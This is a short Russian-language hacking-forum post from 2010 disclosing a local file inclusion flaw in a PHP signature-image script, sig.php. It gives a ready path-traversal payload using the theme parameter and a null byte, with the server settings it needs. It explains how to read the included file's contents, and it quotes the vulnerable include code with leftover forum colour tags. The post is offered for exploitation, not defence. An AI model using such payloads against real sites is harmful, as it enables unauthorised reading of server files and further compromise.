16.08.2010, 22:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
6976
Репутация:
4
|
|
Проверять на скули не стал, ибо табл нету, и там каждый файл уязвим. А так читалки файлов ещё куча.
Local File Include
Need: rg=on. mq=off
Сообщение от None
/sig/sig.php?theme=../../index.php%00
Сохраняем картинку, открываем в блокноте, вуаля HTML код выполненного файла.
/sig/sig.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cachefilename[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"BF2Web Down and no cache file exists."[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]error[/COLOR][COLOR="#007700"];
include([/COLOR][COLOR="#DD0000"]"themes/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/theme.php"[/COLOR][COLOR="#007700"]);
exit;
}
[/COLOR][/COLOR]
|
|
|
|